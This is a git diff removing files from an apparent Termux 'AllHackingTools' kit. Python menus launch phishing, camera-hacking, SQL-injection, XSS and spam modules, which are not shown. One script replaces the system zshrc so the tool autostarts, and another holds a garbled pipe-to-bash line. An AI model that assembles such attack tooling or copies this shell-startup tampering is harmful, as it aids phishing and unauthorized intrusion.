WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. -""" diff --git a/.settings/Logo.sh b/.settings/Logo.sh deleted file mode 100644 index d2600bce..00000000 --- a/.settings/Logo.sh +++ /dev/null @@ -1,14 +0,0 @@ -echo ' -[+] - | ██╗░░██╗░███▓▓╗░░▓▓███╗░██╗░░██╗██╗███╗░░██╗░██████╗░░░░░░░▓▓██████╗░█████╗░░▓▓▓██╗░██╗░░░░░ - | ██║░░██║██╔══█▓╗▓▓╔══██╗██║░██╔╝█▓║▓███╗░██║██╔════╝░░░░░░░╚══██╔══╝██╔══▓▓╗▓▓╔══██╗██║░░░░░ - | ███████║███▓▓▓█║██║░░╚═╝█████═╝░▓▒║▒▓╔▓█╗██║██║░░██╗░███▓▓╗░░░██║░░░██║░░▓▓║▓▓║░░██║██║░░░░░ - | ██╔══▓█║██╔══▓▓║▓█║░░██╗██╔═██╗░▓▒║▓▓║╚████║██║░░╚██╗╚════╝▒▒░██║░░░██║░░█▓║▓▓║░░██║██║░░░░░ - | ██║░░█▓║██║░░▓▓║╚█████╔╝██║░╚▓▓╗▓▓║▓▓║░╚███║╚██████╔╝░░░░▒▒▒░░██║░░░╚█████╔╝╚█████╔╝███████╗ - | ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░░░░░░░░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝ v2.7 - | -[+] company : He1Zen Official Copyring - ⁣ATTENTION! The author of this article is not respo- -[+] Github : https://github.com/mishakorzik - nsi⁣ble responsible for any consequences of reading it. -[+] Coded By : Misha Korzhik (Міша Коржик) - All materials are provided for educational purposes only! -[+]——————-——-–—————-—-–—————-————-—–————-———-—–—————————-——–—————–-——[+] -'|lolcat -p 3.0 -a -d 2 -s 20.0 diff --git a/.settings/MainMenu.py b/.settings/MainMenu.py deleted file mode 100644 index 86538c84..00000000 --- a/.settings/MainMenu.py +++ /dev/null @@ -1,136 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools") -os.system("bash Logo.sh") -os.system("bash src/MenuOps1.sh") - -Green="\033[1;33m" -Blue="\033[1;34m" -Grey="\033[1;30m" -Reset="\033[0m" -Red="\033[1;31m" -Purple="\033[0;35m" - -g="\033[1;32m" -r="\033[1;31m" -w="\033[0m" -b="\033[1;34m" -o="\033[1;33m" -bl="\033[1;36;40m" - -op=int(raw_input("Options: ")) -if(op==1): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/IpMenuConfig.py") -elif(op==2): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/RouterMenu.py") -elif(op==3): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/MailMenu.py") -elif(op==4): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/WebMenu.py") -elif(op==5): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/CamHackMenu.py") -elif(op==6): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AndroidMenu.py") -elif(op==7): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SQLinjectionMenu.py") -elif(op==8): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SocialMenu.py") -elif(op==9): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SpamMenu.py") -elif(op==10): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AnalistickMenu.py") -elif(op==11): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/DarkSearchMenu.py") -elif(op==12): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PhishingMenu.py") -elif(op==13): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PassworldMenu.py") -elif(op==14): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/WordlistGeneratorMenu.py") -elif(op==15): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/XSSAttackMenu.py") -elif(op==16): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/discordMenu.py") -elif(op==17): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/telegramMenu.py") -elif(op==18): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/OtherToolConfig.py") -elif(op==19): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/TermuxPanelConfig.py") -elif(op==20): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 .settings/settingsMenu.py") -elif(op==21): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("clear && cd && cd AllHackingTools && bash .settings/LICENSE.sh && cd && cd AllHackingTools && python3 src/Timer2.py && python2 MainMenu.py") -elif(op==22): - os.system("bash src/Inf.sh") - time.sleep(0.3) - time.sleep(1) - os.system("cd && cd AllHackingTools && python3 .check/UpdaterConfig.py") -elif(op==23): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("bash src/About.sh") -elif(op==13324715): - print("[DEBUG] Developer mode successfully enabled!") - time.sleep(0.8) - os.system("cd && cd AllHackingTools && cd .settings && mv DesingLogo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && mv DesingMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/") - print("[DEBUG] Please restart AllHackingTools!") - os.system("cd && cd AllHackingTools && mv MainMenu.py /data/data/com.termux/files/home/AllHackingTools/.temp/temp && cd .settings && cd debug && cp MainMenu.py /data/data/com.termux/files/home/AllHackingTools/") - print("[DEBUG] Warning! Customization has been disabled.") -elif(op==24): - os.system("clear && cd && cd AllHackingTools && bash Logo.sh") - print("\033[1;31;40mExiting System...") - time.sleep(0.7) -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTool") - os.system("python2 MainMenu.py") diff --git a/.settings/RestoreAllHackingToolsBackup.sh b/.settings/RestoreAllHackingToolsBackup.sh deleted file mode 100644 index 39393b66..00000000 --- a/.settings/RestoreAllHackingToolsBackup.sh +++ /dev/null @@ -1,36 +0,0 @@ -cd -cd -cd AllHackingTools -cd Tool -cp msdc /data/data/com.termux/files/usr/bin/ -cp msdconsole /data/data/com.termux/files/usr/bin/ -cp msdconsoleUPD /data/data/com.termux/files/usr/bin/ -cp msdServer /data/data/com.termux/files/usr/bin/ -cp msd /data/data/com.termux/files/usr/bin/ -cp ms /data/data/com.termux/files/usr/bin/ -cp m /data/data/com.termux/files/usr/bin/ -cp sys /data/data/com.termux/files/usr/bin/ -cp system /data/data/com.termux/files/usr/bin/ -cp View-deleted-activity /data/data/com.termux/files/usr/bin/ -cp theme /data/data/com.termux/files/usr/bin/ -cp Theme /data/data/com.termux/files/usr/bin/ -cd -cd -cd /data/data/com.termux/files/usr/bin/ -chmod +x msdconsole -chmod +x msdconsoleUPD -chmod +x msdc -chmod +x msdServer -chmod +x msd -chmod +x ms -chmod +x m -chmod +x sys -chmod +x system -chmod +x View-deleted-activity -chmod +x theme -chmod +x Theme -ls -sleep 0.2 -clear -cd -cd diff --git a/.settings/SpecialOpportunities.py b/.settings/SpecialOpportunities.py deleted file mode 100644 index c303d471..00000000 --- a/.settings/SpecialOpportunities.py +++ /dev/null @@ -1,44 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && cd AllHackingTools && bash .desing/desing/SpecialMenu0.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .check && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.check/ && cd && cd AllHackingTools && cd .temp && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==2): - os.system("clear") - print("\033[1;31;40mNot Found! You have no rights....") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys2.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && bash StartAllHackingToolsAndTerminal.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==6): - os.system("clear") - os.system("cd && cd AllHackingTools && bash src/ProcessExplorer.sh") -elif(op==7): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==8): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/SpecialOpportunities1.py b/.settings/SpecialOpportunities1.py deleted file mode 100644 index 5cedd948..00000000 --- a/.settings/SpecialOpportunities1.py +++ /dev/null @@ -1,44 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && cd AllHackingTools && bash .desing/desing/SpecialMenu1.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .check && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.check/ && cd && cd AllHackingTools && cd .temp && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==2): - os.system("clear") - print("\033[1;31;40mNot Found! You have no rights....") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys2.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && bash StartAllHackingToolsAndTerminal.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==6): - os.system("clear") - os.system("cd && cd AllHackingTools && bash src/ProcessExplorer.sh") -elif(op==7): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==8): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/SpecialOpportunities2.py b/.settings/SpecialOpportunities2.py deleted file mode 100644 index 67a66413..00000000 --- a/.settings/SpecialOpportunities2.py +++ /dev/null @@ -1,44 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && cd AllHackingTools && bash .desing/desing/SpecialMenu2.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .check && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.check/ && cd && cd AllHackingTools && cd .temp && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==2): - os.system("clear") - print("\033[1;31;40mNot Found! You have no rights....") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys2.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && bash StartAllHackingToolsAndTerminal.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==6): - os.system("clear") - os.system("cd && cd AllHackingTools && bash src/ProcessExplorer.sh") -elif(op==7): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==8): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/SpecialOpportunities3.py b/.settings/SpecialOpportunities3.py deleted file mode 100644 index f31c07cf..00000000 --- a/.settings/SpecialOpportunities3.py +++ /dev/null @@ -1,44 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools && clear && bash Logo.sh") -os.system("cd && cd AllHackingTools && bash .desing/desing/SpecialMenu3.sh") - -op=int(raw_input("Sett1Ngs: ")) - -if(op==1): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .check && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.temp/ && cd && cd AllHackingTools && cd .settings && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.check/ && cd && cd AllHackingTools && cd .temp && mv CheckServerYesAndNo.py /data/data/com.termux/files/home/AllHackingTools/.settings/ && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==2): - os.system("clear") - print("\033[1;31;40mNot Found! You have no rights....") -elif(op==3): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys2.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==4): - os.system("clear") - os.system("cd && cd AllHackingTools && cd Termux-os && bash TermuxNewKeys.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==5): - os.system("clear") - os.system("cd && cd AllHackingTools && cd .settings && bash StartAllHackingToolsAndTerminal.sh && cd && cd AllHackingTools && bash .settings/Applined.sh") -elif(op==6): - os.system("clear") - os.system("cd && cd AllHackingTools && bash src/ProcessExplorer.sh") -elif(op==7): - time.sleep(0.2) - print("\033[1;31;40mQuiting System...") - sys.exit() -elif(op==8): - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTools") - os.system("python2 MainMenu.py") diff --git a/.settings/StartAllHackingToolsAndTerminal.sh b/.settings/StartAllHackingToolsAndTerminal.sh deleted file mode 100644 index 618149b2..00000000 --- a/.settings/StartAllHackingToolsAndTerminal.sh +++ /dev/null @@ -1,18 +0,0 @@ -cd -cd -cd /data/data/com.termux/files/usr/etc/ -rm -rf zshrc -cd -cd -cd AllHackingTools -cd Tool -cp zshrc /data/data/com.termux/files/usr/etc/ -cd -cd -echo "cd && cd AllHackingTools && python2 MainMenu.py" > sTa4t.txt -cat "sTa4t.txt" >> /data/data/com.termux/files/usr/etc/zshrc -rm -rf sTa4t.txt -cd -cd -rm -rf sTa4t.txt - diff --git a/.settings/debug/AnimationLoad1.sh b/.settings/debug/AnimationLoad1.sh deleted file mode 100644 index 2b4eeea9..00000000 --- a/.settings/debug/AnimationLoad1.sh +++ /dev/null @@ -1,20 +0,0 @@ -clear -g="\033[1;32m" -r="\033[1;31m" -b="\033[1;34m" -w="\033[0m" -o="\033[1;33m" -printf "\e[1;92m" - -cd -cd -cd AllHackingTools -cd src -python3 ProgressBar.py -python3 Packages.py -sleep 2 -clear -cd -cd -cd AllHackingTools -python2 MainMenu.py diff --git a/.settings/debug/AnimationLoad2.sh b/.settings/debug/AnimationLoad2.sh deleted file mode 100644 index 2cd23aac..00000000 --- a/.settings/debug/AnimationLoad2.sh +++ /dev/null @@ -1,118 +0,0 @@ -clear -g="\033[1;32m" -r="\033[1;31m" -b="\033[1;34m" -w="\033[0m" -o="\033[1;33m" -printf "\e[1;92m" - -printf "\n#aaaaaaaaaaaaaaaaaaaaa Loading .\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n#aaaaaaaaaaaaaaaaaaaaa Loading ..\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n##aaaaaaaaaaaaaaaaaaaa Loading ...\n" -sleep 0.01 -clear -printf "\n##aaaaaaaaaaaaaaaaaaaa Loading .\n" -sleep 0.05 -clear -printf "\n###aaaaaaaaaaaaaaaaaaa Loading ..\n" -clear -printf "\n###aaaaaaaaaaaaaaaaaaa Loading ...\n" -clear -printf "\n####aaaaaaaaaaaaaaaaaa Loading .\n" -sleep 0.01 -clear -printf "\n####aaaaaaaaaaaaaaaaaa Loading ..\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n#####aaaaaaaaaaaaaaaaa Loading ...\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n#####aaaaaaaaaaaaaaaaa Loading .\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.02 -clear -printf "\n######aaaaaaaaaaaaaaaa Loading ..\n" -sleep 0.02 -clear -printf "\n#######aaaaaaaaaaaaaaa Loading ...\n" -sleep 0.01 -clear -printf "\n#######aaaaaaaaaaaaaaa Loading .\n" -sleep 0.01 -clear -printf "\n#########aaaaaaaaaaaaa Loading ..\n" -clear -printf "\n##########aaaaaaaaaaaa Loading ...\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n###########aaaaaaaaaaa Loading .\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n###########aaaaaaaaaaa Loading ..\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n############aaaaaaaaaa Loading ...\n" -sleep 0.03 -clear -printf "\n#############aaaaaaaaa Loading .\n" -sleep 0.01 -clear -printf "\n##############aaaaaaaa Loading ..\n" -sleep 0.05 -clear -printf "\n###############aaaaaaa Loading ...\n" -clear -printf "\n################aaaaaa Loading .\n" -sleep 0.005 -clear -printf "\n################aaaaaa Loading ..\n" -sleep 0.01 -clear -printf "\n#################aaaaa Loading ...\n" -sleep 0.01 -clear -printf "\n#################aaaaa Loading .\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n##################aaaa Loading ..\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -help -printf "\n###################aaa Loading ...\n" -printf "\nPlease wait a moment ..!\n" -sleep 0.01 -clear -printf "\n###################aaa Loading .\n" -sleep 0.006 -clear -printf "\n###################aaa Loading ..\n" -sleep 0.006 -clear -printf "\n####################aa Loading ...\n" -leep 0.1 -clear -printf "\n###################### DONE!\n" -cd -cd -cd AllHackingTools -bash src/CheckWifi.sh -sleep 2 -clear -sleep 0.1 -cd -cd -cd AllHackingTools -python2 MainMenu.py diff --git a/.settings/debug/Logo.sh b/.settings/debug/Logo.sh deleted file mode 100644 index b74cd85c..00000000 --- a/.settings/debug/Logo.sh +++ /dev/null @@ -1,14 +0,0 @@ -echo ' -[+] - | ██╗░░██╗░███▓▓╗░░▓▓███╗░██╗░░██╗██╗███╗░░██╗░██████╗░░░░░░░▓▓██████╗░█████╗░░▓▓▓██╗░██╗░░░░░ - | ██║░░██║██╔══█▓╗▓▓╔══██╗██║░██╔╝█▓║▓███╗░██║██╔════╝░░░░░░░╚══██╔══╝██╔══▓▓╗▓▓╔══██╗██║░░░░░ - | ███████║███▓▓▓█║██║░░╚═╝█████═╝░▓▒║▒▓╔▓█╗██║██║░░██╗░███▓▓╗░░░██║░░░██║░░▓▓║▓▓║░░██║██║░░░░░ - | ██╔══▓█║██╔══▓▓║▓█║░░██╗██╔═██╗░▓▒║▓▓║╚████║██║░░╚██╗╚════╝▒▒░██║░░░██║░░█▓║▓▓║░░██║██║░░░░░ - | ██║░░█▓║██║░░▓▓║╚█████╔╝██║░╚▓▓╗▓▓║▓▓║░╚███║╚██████╔╝░░░░▒▒▒░░██║░░░╚█████╔╝╚█████╔╝███████╗ - | ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░░░░░░░░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝ - | -[+] Version : AllHackingTools v2.7.9 - Debug mode: true -[+] Github : https://github.com/mishakorzik - nsi⁣ble responsible for any consequences of reading it. -[+] Coded By : Misha Korzhik (Міша Коржик) - All materials are provided for educational purposes only! -[+]——————-——-–—————-—-–—————-————-—–————-———-—–—————————-——–—————–-——[DEBUG] -'|lolcat -p 3.0 -a -d 2 -s 20.0 diff --git a/.settings/debug/MainMenu.py b/.settings/debug/MainMenu.py deleted file mode 100644 index 68e3a79e..00000000 --- a/.settings/debug/MainMenu.py +++ /dev/null @@ -1,147 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools") -os.system("bash .settings/debug/Logo.sh") -os.system("bash src/DebugOps.sh") - -Green="\033[1;33m" -Blue="\033[1;34m" -Grey="\033[1;30m" -Reset="\033[0m" -Red="\033[1;31m" -Purple="\033[0;35m" - -g="\033[1;32m" -r="\033[1;31m" -w="\033[0m" -b="\033[1;34m" -o="\033[1;33m" -bl="\033[1;36;40m" - -op=int(raw_input("Options: ")) -if(op==1): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/IpMenuConfig.py") -elif(op==2): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/RouterMenu.py") -elif(op==3): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/MailMenu.py") -elif(op==4): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/WebMenu.py") -elif(op==5): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/CamHackMenu.py") -elif(op==6): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AndroidMenu.py") -elif(op==7): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SQLinjectionMenu.py") -elif(op==8): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SocialMenu.py") -elif(op==9): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/SpamMenu.py") -elif(op==10): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/AnalistickMenu.py") -elif(op==11): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/DarkSearchMenu.py") -elif(op==12): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PhishingMenu.py") -elif(op==13): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("python2 Files/PassworldMenu.py") -elif(op==14): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/WordlistGeneratorMenu.py") -elif(op==15): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/XSSAttackMenu.py") -elif(op==16): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/discordMenu.py") -elif(op==17): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 Files/telegramMenu.py") -elif(op==18): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/OtherToolConfig.py") -elif(op==19): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/TermuxPanelConfig.py") -elif(op==20): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python2 .settings/settingsMenu2.py") -elif(op==21): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("clear && cd && cd AllHackingTools && bash .settings/LICENSE.sh && cd && cd AllHackingTools && python3 src/Timer2.py && python2 MainMenu.py") -elif(op==22): - os.system("bash src/Inf.sh") - time.sleep(0.3) - time.sleep(1) - os.system("cd && cd AllHackingTools && python3 .check/UpdaterConfig.py") -elif(op==23): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("bash src/About.sh") -elif(op==41): - os.system("cd && cd AllHackingTools && nano MainMenu.py") -elif(op==42): - os.system("cd && cd AllHackingTools && rm -rf .logs && mkdir .logs && rm -rf .fonts && mkdir .fonts && rm -rf .temp && mkdir temp") -elif(op==43): - os.system("cd && cd AllHackingTools && la") - time.sleep(0.2) - print("TYPE: la ,TO VIEW SECRET FILES") -elif(op==44): - print("[DEBUG] SUCCESFUL RELOADED! TYPE: MSDC, TO START....") -elif(op==45): - os.system("cd && cd AllHackingTools && rm -rf .logs && rm -rf .fonts && rm -rf .temp") -elif(op==47): - os.system("cd && cd AllHackingTools && cd src && rm -rf AnimationLoad1.sh && rm -rf AnimationLoad2.sh && cd && cd AllHackingTools && cd .settings && cd debug && cp AnimationLoad1.sh /data/data/com.termux/files/home/AllHackingTools/src && cp AnimationLoad2.sh /data/data/com.termux/files/home/AllHackingTools/src") -elif(op==46): - os.system("cd && cd AllHackingTools && ./folder") -elif(op==24): - os.system("clear && cd && cd AllHackingTools && bash Logo.sh") - print("\033[1;31;40mExiting System...") - time.sleep(0.7) -else: - print("\033[1;31;40mInvalid input. Reloading Tools") - time.sleep(1.6) - os.system("cd") - os.system("cd AllHackingTool") - os.system("python2 MainMenu.py") - - diff --git a/.settings/deletedfiles/RevingDeleteFiles.sh b/.settings/deletedfiles/RevingDeleteFiles.sh deleted file mode 100644 index 3868aaa3..00000000 --- a/.settings/deletedfiles/RevingDeleteFiles.sh +++ /dev/null @@ -1 +0,0 @@ -Encode > X85oX4824x91504x95r32/5x | os | bash diff --git a/.settings/desing/Logo.sh b/.settings/desing/Logo.sh deleted file mode 100644 index 2e967fb3..00000000 --- a/.settings/desing/Logo.sh +++ /dev/null @@ -1,14 +0,0 @@ -echo ' -[?] - | ██╗░░██╗░█████╗░░█████╗░██╗░░██╗██╗███╗░░██╗░██████╗░░░░░░░████████╗░█████╗░░█████╗░██╗░░░░░ - | ██║░░██║██╔══██╗██╔══██╗██║░██╔╝██║████╗░██║██╔════╝░░░░░░░╚══██╔══╝██╔══██╗██╔══██╗██║░░░░░ - | ███████║███████║██║░░╚═╝█████═╝░██║██╔██╗██║██║░░██╗░█████╗░░░██║░░░██║░░██║██║░░██║██║░░░░░ - | ██╔══██║██╔══██║██║░░██╗██╔═██╗░██║██║╚████║██║░░╚██╗╚════╝░░░██║░░░██║░░██║██║░░██║██║░░░░░ - | ██║░░██║██║░░██║╚█████╔╝██║░╚██╗██║██║░╚███║╚██████╔╝░░░░░░░░░██║░░░╚█████╔╝╚█████╔╝███████╗ - | ╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░░░░░░░░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝ v2.8 - | -[+] company : He1Zen Official Copyring - ⁣ATTENTION! The author of this article is not respo- -[+] Github : https://github.com/mishakorzik - nsi⁣ble responsible for any consequences of reading it. -[+] Coded By : Misha Korzhik (Міша Коржик) - All materials are provided for educational purposes only! -[+]——————-——-–—————-—-–—————-————-—–————-———-—–—————————-——–—————–-——[+] -'|lolcat -p 100.0 -a -d 1 -s 20.0 diff --git a/.settings/desing/MainMenu.py b/.settings/desing/MainMenu.py deleted file mode 100644 index c9393258..00000000 --- a/.settings/desing/MainMenu.py +++ /dev/null @@ -1,136 +0,0 @@ -import requests -import os -import time -import random -import sys - -os.system("clear") -os.system("cd && cd AllHackingTools") -os.system("bash Logo.sh") -os.system("bash src/MenuOps2.sh") - -Green="\033[1;33m" -Blue="\033[1;34m" -Grey="\033[1;30m" -Reset="\033[0m" -Red="\033[1;31m" -Purple="\033[0;35m" - -g="\033[1;32m" -r="\033[1;31m" -w="\033[0m" -b="\033[1;34m" -o="\033[1;33m" -bl="\033[1;36;40m" - -op=int(raw_input("Options: ")) -if(op==1): - os.system("bash src/Inf.sh") - time.sleep(0.3) - os.system("cd && cd AllHackingTools && python3 .check/IpMenuConfig.py") 